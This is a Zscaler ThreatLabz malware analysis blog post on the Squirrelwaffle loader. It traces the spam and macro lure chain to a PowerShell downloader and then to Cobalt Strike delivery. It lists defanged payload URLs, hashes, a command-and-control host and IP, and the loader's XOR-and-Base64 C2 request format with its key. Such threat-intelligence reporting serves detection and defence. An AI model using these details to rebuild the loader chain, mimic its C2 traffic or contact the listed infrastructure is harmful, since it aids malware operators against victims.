Experience the transformative power of zero trust.
The Zscaler Difference
Zero Trust Fundamentals
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Products
Transform your organization with 100% cloud native services
Solution Areas
Propel your business with zero trust solutions that secure and connect your resources
Learn how Zscaler delivers zero trust with a cloud native platform that is the world’s largest security cloud
Transform with Zero Trust Architecture
Propel your transformation journey
Secure Your Business Goals
Achieve your business and IT initiatives
Explore tools and resources to accelerate your transformation and secure your world
Amplifying the voices of real-world digital and zero trust pioneers
Resource Center
Stay up to date on best practices
Events & Trainings
Find programs, certifications, and events
Security Research & Services
Get research and insights at your fingertips
Tools
Tools designed for you
Community & Support
Connect and find support
Industry & Market Solutions
See solutions for your industry and country
Resource Center
Stay up to date on best practices
Events & Trainings
Find programs, certifications, and events
Security Research & Services
Get research and insights at your fingertips
Tools
Tools designed for you
Community & Support
Connect and find support
Industry & Market Solutions
See solutions for your industry and country
Discover how it began and where it’s going
Meet our partners and explore system integrators and technology alliances
Stay up to date with the latest news
Meet our management team
Explore best-in-class partner integrations to help you accelerate digital transformation
See news, stock information, and quarterly reports
Learn about our ESG approach
Join our mission
Find everything you need to cover Zscaler
Understand our adherence to rigorous standards
Understand our adherence to rigorous standards
Get the latest Zscaler blog updates in your inbox
Contents
Zscaler ThreatLabz has been following an emerging new malware loader known as Squirrelwaffle that is being used to deliver Cobalt Strike. In this blog, we will be analyzing the complete attack chain for this new malware family (as shown in Figure 1). This campaign has been running since mid-September 2021. The Squirrelwaffle loader is being delivered from the same infrastructure that was delivering the Qakbot banking trojan.
 

Figure 1: Squirrelwaffle Attack Chain
 
Squirrelwaffle campaigns generally start via spam emails that attempt to convince victims to click an embedded URL using a technique known as email thread hijacking. Email thread hijacking leverages emails that have been stolen prior to the attack and later repurposed to dupe a victim into believing that an email is from someone that they know who is replying to the same thread. Once a victim clicks on the URL, a ZIP file is downloaded that contains a Microsoft Word document. These documents follow a similar naming convention matching the regular expression diagram-\d{2,3}.doc.
For example, the file with an MD5 hash E599A656599A2680C9392C7329D9D519 has the filename diagram-346.doc.
This document is using a DocuSign template lure that instructs the user to enable a macro to view the content (as shown in Figure 2). All the other documents analyzed by Zscaler ThreatLabz have exactly the same content with multiple modules that contain VBA code.

Figure 2: Squirrelwaffle Microsoft Word document lure containing a malicious macro
Once the user enables the macro, an AutoOpen() subroutine is called which then executes a malicious Visual Basic Application (VBA) macro. Here, the AutoOpen() subroutine calls another function efile() in the bxh module. There is a UserForm object in the document which contains a VBS file named pin.vbs that is embedded in the caption of the DocuSign image. The document that contains the macro code leverages cscript.exe to extract the embedded VBS file, which is written to the %ProgramData% folder, and executed using wscript.exe. This VBS file contains an obfuscated PowerShell script with 5 different URLs to download the Squirrelwaffle payload as shown in Figure 3. The payload is written to %ProgramData% with the filename ww1.dll.

Figure 3: Example VBA code that drops a VBS file in the %ProgramData% folder that is used to download Squirrelwaffle
The VBS file simply uses the IEX (Invoke-Expression) function to download the Squirrelwaffle loader. The payload DLL is executed via rundll32.exe by invoking the export function name ldr.

Figure 4: Example VBS code that downloads and executes the Squirrelwaffle loader.
Example (sanitized) URLs that were used to retrieve Squirrelwaffle are shown below:
hxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html
hxxps://perfectdemos[.]com/Gv1iNAuMKZ/pt.html
hxxps://bussiness-z[.]ml/ze8pCNTIkrIS/pt.html
hxxps://cablingpoint[.]com/ByH5NDoE3kQA/pt.html
hxxps://bonus.corporatebusinessmachines[.]co.in/1Y0qVNce/pt.html
Figure 5 shows the ProgramData folder after the VBS script is executed and the Squirrelwaffle payloads have been downloaded

Figure 5: Disk artifacts after the pin.vbs file has been executed and downloaded the Squirrelwaffle loader DLL.
The threat actor behind these campaigns has changed some of their TTPs over time. Recently, the initial infection vector has used hidden Microsoft Excel sheets with an Auto_Open() macro, which downloads the Squirrelwafle loader from three different URLs. The Squirrelwaffle loader is subsequently executed via regsvr32.exe. An example for this campaign shown in Figure 6, used a Microsoft Excel document with the MD5 hash 77BD39191FDC817F2F14F0462BFF8D86 and a filename matching the regular expression diagram-\d{1,9}.xls.

Figure 6: Microsoft Excel with a malicious macro used to deliver Squirrelwaffle
The hidden sheet in this Excel document is shown in Figure 7.

Figure 7: Excel 4.0 hidden sheet containing a malicious macro code
The extracted macro code is shown in Figure 8.

Figure 8: Macro code extracted from a hidden Excel sheet
The threat actor also changed the location where the payload is written to disk. Example (sanitized) URLs that were used to retrieve Squirrelwaffle from this campaign are shown below:
hxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec.html
hxxps://orquideavallenata[.]com/4jmDb0s9sg/sec.html
hxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec.html
 
This analysis covers the Squirrelwaffle with the MD5 hash 479DAE0F72F4D57BD20E0BF8CB3EBDF7. Once the Squirrelwaffle payload is downloaded, it will either be executed via rundll32.exe or regsvr.exe depending upon the initial infection vector that was used to download the payload. Squirrelwaffle loader samples have a recent compilation date using Visual Studio 2017 as shown in Figure 9.

Figure 9: Squirrelwaffle compilation metadata
The Squirrelwaffle loader is a 32-bit DLL, which is packed with a custom packer. Similar packers have been observed in other malware families including Ursnif and Zloader.
Squirrelwaffle contains a hardcoded configuration that is encrypted in the binary. There are two main components: a list of CnC URLs and a list of IP addresses to block, which belong to sandboxes and analysis platforms. These lists are obfuscated using an XOR-based algorithm with hardcoded keys. An example formatted Squirrelwaffle configuration is shown in Figure 10.

Figure 10: Formatted Squirrelwaffle configuration after decryption
Once the malware decodes all of the CnC domains and IP addresses to block, it creates a socket and sends the data using the send() function and receives the content from the CnC using recv() calls. The CnC communication protocol utilizes an HTTP POST request with a Base64 encoded payload that is encrypted using an XOR-based algorithm with the hardcoded key KJKLO. An example HTTP POST request is shown below:
POST /dXf4cS4GPL/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkenw= HTTP/1.1
Host: test.dirigu.ro
Content-Length: 76
eHp+fHZ7Q0ICAAUPQkUMcRYePyo5ORcrKiQ4LCkTCjo7CC4/KxceIConIiIoQkMHHw0CAhoKRkI=
Note that this request does not contain a User-Agent field in the HTTP header.
The path of the HTTP POST request consists of a hardcoded prefix and a Base64 encoded string that is encrypted using the same XOR-based algorithm and key as described above. This encoded string includes an alphanumeric string with a random length between 1 and 28 characters followed by the IP address of the system. Each field is delimited by a single tab character. An example before encryption is shown below:
t2nQfj3SL3XByImciQTqVa\t192.168.125.11
The HTTP POST body contains another Base64 encoded string that includes the victim’s computer name, username, application data directory, and workgroup. Each field is delimited with two tab characters. An example payload before encryption is shown below:

This second-stage payload will be written to a filename that consists of eleven random alphanumeric characters appended with a .txt extension, and then executed by SquirrelWaffle.
Zscaler ThreatLabz has observed Squirrelwaffle deliver an executable file with the MD5 hash 116301FD453397FDF3CB291341924147. This file is packed and decrypted in memory to produce a Cobalt Strike stager with the MD5 hash 38DB72B33ABCEA250F5B7CB5AB514B2C, which further downloads the Cobalt Strike beacon.
Figure 11 below shows interesting strings in the Cobalt Strike stager that impersonates a jQuery request. The EICAR string is likely an artifact from the threat actor using a demo version of Cobalt Strike.

Figure 11: Cobalt Strike stager delivered by Squirrelwaffle with interesting strings highlighted.
The Cobalt Strike stager sends an HTTPS GET request to 213.227.154[.]92 with the path /jquery-3.3.1.slim.min.js. The Cobalt Strike CnC server responds with a jQuery file with the encrypted Cobalt Strike beacon embedded as binary data in the middle of the file as shown in Figure 12.

Figure 12: Encrypted Cobalt Strike beacon embedded in jQuery code starting at offset 0xfaf.
This binary data consists of shellcode that decrypts the Cobalt Strike beacon using the XOR-based algorithm replicated below in Figure 13.

Figure 13: Cobalt Strike beacon decryption algorithm.
The Cobalt Strike beacon observed by Zscaler ThreatLabz contains the following CnC servers:


Figure 14: Zscaler Cloud Sandbox detection of Squirrelwaffle Loader
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels including the signature shown below:
Win32.Downloader.Squirrelwaffle
 
After the Emotet botnet takedown earlier this year, criminal threat actors are filling that void. Squirrelwaffle appears to be a new loader taking advantage of this gap. It is not yet clear if Squirrelwaffle is developed and distributed by a known threat actor or a new group. However, similar distribution techniques were previously used by Emotet. The Zscaler ThreatLabz team will continue to monitor this attack, as well as others, to help keep our customers safe.
 
 
By submitting the form, you are agreeing to our privacy policy.
Learn about:
Zscaler is universally recognized as the leader in zero trust. Leveraging the largest security cloud on the planet, Zscaler anticipates, secures, and simplifies the experience of doing business for the world's most established companies.
All rights reserved. Zscaler™ and other trademarks listed at zscaler.com/legal/trademarks are either (i) registered trademarks or service marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States and/or other countries. Any other trademarks are the properties of their respective owners.
